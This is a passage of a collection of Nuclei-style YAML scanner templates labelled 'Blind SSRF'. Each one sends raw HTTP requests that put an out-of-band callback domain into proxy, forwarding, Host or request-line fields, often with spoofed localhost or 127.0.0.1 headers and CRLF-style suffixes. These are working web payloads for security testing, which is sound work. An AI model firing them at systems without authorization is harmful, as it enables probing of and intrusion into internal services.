        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-129.yaml:
--------------------------------------------------------------------------------
id: 0x129

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET @{{Host}}.{{Port}}.BSSRF-129.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: localhost
        X-Forwarded-Host: localhost
        X-Forwarded: localhost
        Forwarded-For: localhost
        Forwarded: for=localhost;by=localhost;host=localhost
        X-Remote-IP: localhost
        X-Remote-Addr: localhost
        True-Client-IP: localhost
        Client-IP: localhost
        X-Client-IP: localhost
        X-Cluster-Client-IP: localhost
        WL-Proxy-Client-IP: localhost
        Proxy-Client-IP: localhost
        Fastly-Client-Ip: localhost
        True-Client-Ip: localhost
        X-Real-IP: localhost
        X-Originating-IP: localhost
        Ali-CDN-Real-IP: localhost
        Cdn-Src-Ip: localhost
        Cdn-Real-Ip: localhost
        CF-Connecting-IP: localhost
        X-Host: localhost
        X-Custom-IP-Authorization: localhost
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-13.yaml:
--------------------------------------------------------------------------------
id: 0x013

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-013.{{MY-DOMAIN}}
        Referer: {{Scheme}}://{{Host}}.{{Port}}.BSSRF-013.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-130.yaml:
--------------------------------------------------------------------------------
id: 0x130

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-130.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: localhost
        X-Forwarded-Host: localhost
        X-Forwarded: localhost
        Forwarded-For: localhost
        Forwarded: for=localhost;by=localhost;host=localhost
        X-Remote-IP: localhost
        X-Remote-Addr: localhost
        True-Client-IP: localhost
        Client-IP: localhost
        X-Client-IP: localhost
        X-Cluster-Client-IP: localhost
        WL-Proxy-Client-IP: localhost
        Proxy-Client-IP: localhost
        Fastly-Client-Ip: localhost
        True-Client-Ip: localhost
        X-Real-IP: localhost
        X-Originating-IP: localhost
        Ali-CDN-Real-IP: localhost
        Cdn-Src-Ip: localhost
        Cdn-Real-Ip: localhost
        CF-Connecting-IP: localhost
        X-Host: localhost
        X-Custom-IP-Authorization: localhost
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-131.yaml:
--------------------------------------------------------------------------------
id: 0x131

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-131.{{MY-DOMAIN}}/ HTTP/0.9
        X-Forwarded-For: localhost
        X-Forwarded-Host: localhost
        X-Forwarded: localhost
        Forwarded-For: localhost
        Forwarded: for=localhost;by=localhost;host=localhost
        X-Remote-IP: localhost
        X-Remote-Addr: localhost
        True-Client-IP: localhost
        Client-IP: localhost
        X-Client-IP: localhost
        X-Cluster-Client-IP: localhost
        WL-Proxy-Client-IP: localhost
        Proxy-Client-IP: localhost
        Fastly-Client-Ip: localhost
        True-Client-Ip: localhost
        X-Real-IP: localhost
        X-Originating-IP: localhost
        Ali-CDN-Real-IP: localhost
        Cdn-Src-Ip: localhost
        Cdn-Real-Ip: localhost
        CF-Connecting-IP: localhost
        X-Host: localhost
        X-Custom-IP-Authorization: localhost
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-132.yaml:
--------------------------------------------------------------------------------
id: 0x132

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET :@{{Host}}.{{Port}}.BSSRF-132.{{MY-DOMAIN}}/ HTTP/1.1
        X-Forwarded-For: localhost
        X-Forwarded-Host: localhost
        X-Forwarded: localhost
        Forwarded-For: localhost
        Forwarded: for=localhost;by=localhost;host=localhost
        X-Remote-IP: localhost
        X-Remote-Addr: localhost
        True-Client-IP: localhost
        Client-IP: localhost
        X-Client-IP: localhost
        X-Cluster-Client-IP: localhost
        WL-Proxy-Client-IP: localhost
        Proxy-Client-IP: localhost
        Fastly-Client-Ip: localhost
        True-Client-Ip: localhost
        X-Real-IP: localhost
        X-Originating-IP: localhost
        Ali-CDN-Real-IP: localhost
        Cdn-Src-Ip: localhost
        Cdn-Real-Ip: localhost
        CF-Connecting-IP: localhost
        X-Host: localhost
        X-Custom-IP-Authorization: localhost
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-133.yaml:
--------------------------------------------------------------------------------
id: 0x133

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET @{{Host}}.{{Port}}.BSSRF-133.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1
        X-Forwarded-Host: 127.0.0.1
        X-Forwarded: 127.0.0.1
        Forwarded-For: 127.0.0.1
        Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
        X-Remote-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        True-Client-IP: 127.0.0.1
        Client-IP: 127.0.0.1
        X-Client-IP: 127.0.0.1
        X-Cluster-Client-IP: 127.0.0.1
        WL-Proxy-Client-IP: 127.0.0.1
        Proxy-Client-IP: 127.0.0.1
        Fastly-Client-Ip: 127.0.0.1
        True-Client-Ip: 127.0.0.1
        X-Real-IP: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        Ali-CDN-Real-IP: 127.0.0.1
        Cdn-Src-Ip: 127.0.0.1
        Cdn-Real-Ip: 127.0.0.1
        CF-Connecting-IP: 127.0.0.1
        X-Host: 127.0.0.1
        X-Custom-IP-Authorization: 127.0.0.1
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-134.yaml:
--------------------------------------------------------------------------------
id: 0x134

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET :@{{Host}}.{{Port}}.BSSRF-134.{{MY-DOMAIN}}/ HTTP/1.1
        X-Forwarded-For: 127.0.0.1
        X-Forwarded-Host: 127.0.0.1
        X-Forwarded: 127.0.0.1
        Forwarded-For: 127.0.0.1
        Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
        X-Remote-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        True-Client-IP: 127.0.0.1
        Client-IP: 127.0.0.1
        X-Client-IP: 127.0.0.1
        X-Cluster-Client-IP: 127.0.0.1
        WL-Proxy-Client-IP: 127.0.0.1
        Proxy-Client-IP: 127.0.0.1
        Fastly-Client-Ip: 127.0.0.1
        True-Client-Ip: 127.0.0.1
        X-Real-IP: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        Ali-CDN-Real-IP: 127.0.0.1
        Cdn-Src-Ip: 127.0.0.1
        Cdn-Real-Ip: 127.0.0.1
        CF-Connecting-IP: 127.0.0.1
        X-Host: 127.0.0.1
        X-Custom-IP-Authorization: 127.0.0.1
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-135.yaml:
--------------------------------------------------------------------------------
id: 0x135

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-135.{{MY-DOMAIN}}/ HTTP/0.9
        X-Forwarded-For: 127.0.0.1
        X-Forwarded-Host: 127.0.0.1
        X-Forwarded: 127.0.0.1
        Forwarded-For: 127.0.0.1
        Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
        X-Remote-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        True-Client-IP: 127.0.0.1
        Client-IP: 127.0.0.1
        X-Client-IP: 127.0.0.1
        X-Cluster-Client-IP: 127.0.0.1
        WL-Proxy-Client-IP: 127.0.0.1
        Proxy-Client-IP: 127.0.0.1
        Fastly-Client-Ip: 127.0.0.1
        True-Client-Ip: 127.0.0.1
        X-Real-IP: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        Ali-CDN-Real-IP: 127.0.0.1
        Cdn-Src-Ip: 127.0.0.1
        Cdn-Real-Ip: 127.0.0.1
        CF-Connecting-IP: 127.0.0.1
        X-Host: 127.0.0.1
        X-Custom-IP-Authorization: 127.0.0.1
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-136.yaml:
--------------------------------------------------------------------------------
id: 0x136

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-136.{{MY-DOMAIN}}/ HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: 127.0.0.1
        X-Forwarded-Host: 127.0.0.1
        X-Forwarded: 127.0.0.1
        Forwarded-For: 127.0.0.1
        Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
        X-Remote-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        True-Client-IP: 127.0.0.1
        Client-IP: 127.0.0.1
        X-Client-IP: 127.0.0.1
        X-Cluster-Client-IP: 127.0.0.1
        WL-Proxy-Client-IP: 127.0.0.1
        Proxy-Client-IP: 127.0.0.1
        Fastly-Client-Ip: 127.0.0.1
        True-Client-Ip: 127.0.0.1
        X-Real-IP: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        Ali-CDN-Real-IP: 127.0.0.1
        Cdn-Src-Ip: 127.0.0.1
        Cdn-Real-Ip: 127.0.0.1
        CF-Connecting-IP: 127.0.0.1
        X-Host: 127.0.0.1
        X-Custom-IP-Authorization: 127.0.0.1
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-137.yaml:
--------------------------------------------------------------------------------
id: 0x137

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET {{Scheme}}://{{Host}}.{{Port}}.BSSRF-137.{{MY-DOMAIN}}/ HTTP/1.0
        X-Forwarded-For: 127.0.0.1
        X-Forwarded-Host: 127.0.0.1
        X-Forwarded: 127.0.0.1
        Forwarded-For: 127.0.0.1
        Forwarded: for=127.0.0.1;by=127.0.0.1;host=127.0.0.1
        X-Remote-IP: 127.0.0.1
        X-Remote-Addr: 127.0.0.1
        True-Client-IP: 127.0.0.1
        Client-IP: 127.0.0.1
        X-Client-IP: 127.0.0.1
        X-Cluster-Client-IP: 127.0.0.1
        WL-Proxy-Client-IP: 127.0.0.1
        Proxy-Client-IP: 127.0.0.1
        Fastly-Client-Ip: 127.0.0.1
        True-Client-Ip: 127.0.0.1
        X-Real-IP: 127.0.0.1
        X-Originating-IP: 127.0.0.1
        Ali-CDN-Real-IP: 127.0.0.1
        Cdn-Src-Ip: 127.0.0.1
        Cdn-Real-Ip: 127.0.0.1
        CF-Connecting-IP: 127.0.0.1
        X-Host: 127.0.0.1
        X-Custom-IP-Authorization: 127.0.0.1
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-138.yaml:
--------------------------------------------------------------------------------
id: 0x138

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-138.{{MY-DOMAIN}}/ HTTP/1.0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-139.yaml:
--------------------------------------------------------------------------------
id: 0x139

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-139.{{MY-DOMAIN}}/ HTTP/1.0
        X-Forwarded-For: localhost
        X-Forwarded-Host: localhost
        X-Forwarded: localhost
        Forwarded-For: localhost
        Forwarded: for=localhost;by=localhost;host=localhost
        X-Remote-IP: localhost
        X-Remote-Addr: localhost
        True-Client-IP: localhost
        Client-IP: localhost
        X-Client-IP: localhost
        X-Cluster-Client-IP: localhost
        WL-Proxy-Client-IP: localhost
        Proxy-Client-IP: localhost
        Fastly-Client-Ip: localhost
        True-Client-Ip: localhost
        X-Real-IP: localhost
        X-Originating-IP: localhost
        Ali-CDN-Real-IP: localhost
        Cdn-Src-Ip: localhost
        Cdn-Real-Ip: localhost
        CF-Connecting-IP: localhost
        X-Host: localhost
        X-Custom-IP-Authorization: localhost
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-14.yaml:
--------------------------------------------------------------------------------
id: 0x014

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-For: {{Host}}.{{Port}}.BSSRF-014.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-140.yaml:
--------------------------------------------------------------------------------
id: 0x140

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-140.{{MY-DOMAIN}}/ HTTP/1.0
        X-Forwarded-For: 127.0.0.1\r
        X-Real-IP: 127.0.0.1\r
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-141.yaml:
--------------------------------------------------------------------------------
id: 0x141

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET http://{{Host}}.{{Port}}.BSSRF-141.{{MY-DOMAIN}}/ HTTP/1.0
        X-Forwarded-For: 127.0.0.1%0d
        X-Real-IP: 127.0.0.1%0d
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-142.yaml:
--------------------------------------------------------------------------------
id: 0x142

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Proxy: {{Host}}.{{Port}}.BSSRF-142.{{MY-DOMAIN}}
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-143.yaml:
--------------------------------------------------------------------------------
id: 0x143

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.0
        Host: {{Hostname}}
        X-WAP-Profile: http://{{Host}}.{{Port}}.BSSRF-143.{{MY-DOMAIN}}/file.xml
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-15.yaml:
--------------------------------------------------------------------------------
id: 0x015

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Host}}.{{Port}}.BSSRF-015.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-16.yaml:
--------------------------------------------------------------------------------
id: 0x016

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded: {{Host}}.{{Port}}.BSSRF-016.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-17.yaml:
--------------------------------------------------------------------------------
id: 0x017

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Forwarded-For: {{Host}}.{{Port}}.BSSRF-017.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-18.yaml:
--------------------------------------------------------------------------------
id: 0x18

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Forwarded: for={{Host}}.{{Port}}.BSSRF-018.{{MY-DOMAIN}};by={{Host}}.{{Port}}.BSSRF-018.{{MY-DOMAIN}};host={{Host}}.{{Port}}.BSSRF-018.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-19.yaml:
--------------------------------------------------------------------------------
id: 0x019

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Remote-IP: {{Host}}.{{Port}}.BSSRF-019.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-2.yaml:
--------------------------------------------------------------------------------
id: 0x002

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET {{BaseURL}} HTTP/1.1
        Host: {{Host}}.{{Port}}.BSSRF-002.{{MY-DOMAIN}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-20.yaml:
--------------------------------------------------------------------------------
id: 0x020

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Remote-Addr: {{Host}}.{{Port}}.BSSRF-020.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-21.yaml:
--------------------------------------------------------------------------------
id: 0x021

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        True-Client-IP: {{Host}}.{{Port}}.BSSRF-021.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-22.yaml:
--------------------------------------------------------------------------------
id: 0x022

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Client-IP: {{Host}}.{{Port}}.BSSRF-022.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-23.yaml:
--------------------------------------------------------------------------------
id: 0x023

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Client-IP: {{Host}}.{{Port}}.BSSRF-023.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-24.yaml:
--------------------------------------------------------------------------------
id: 0x024

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Cluster-Client-IP: {{Host}}.{{Port}}.BSSRF-024.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-25.yaml:
--------------------------------------------------------------------------------
id: 0x025

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        WL-Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-025.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-26.yaml:
--------------------------------------------------------------------------------
id: 0x026

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Proxy-Client-IP: {{Host}}.{{Port}}.BSSRF-026.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-27.yaml:
--------------------------------------------------------------------------------
id: 0x027

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Fastly-Client-Ip: {{Host}}.{{Port}}.BSSRF-027.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-28.yaml:
--------------------------------------------------------------------------------
id: 0x028

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        True-Client-Ip: {{Host}}.{{Port}}.BSSRF-028.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-29.yaml:
--------------------------------------------------------------------------------
id: 0x029

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Real-IP: {{Host}}.{{Port}}.BSSRF-029.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-3.yaml:
--------------------------------------------------------------------------------
id: 0x003

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}@{{Host}}.{{Port}}.BSSRF-003.{{MY-DOMAIN}}
        Cache-Control: no-transform
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-30.yaml:
--------------------------------------------------------------------------------
id: 0x030

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Originating-IP: {{Host}}.{{Port}}.BSSRF-030.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
        words:
          - "Your Match"
--------------------------------------------------------------------------------
/Templates/BlindSSRF-31.yaml:
--------------------------------------------------------------------------------
id: 0x031

info:
  name: Blind SSRF
  author: 0xAwali
  severity: info

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Ali-CDN-Real-IP: {{Host}}.{{Port}}.BSSRF-031.{{MY-DOMAIN}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: body
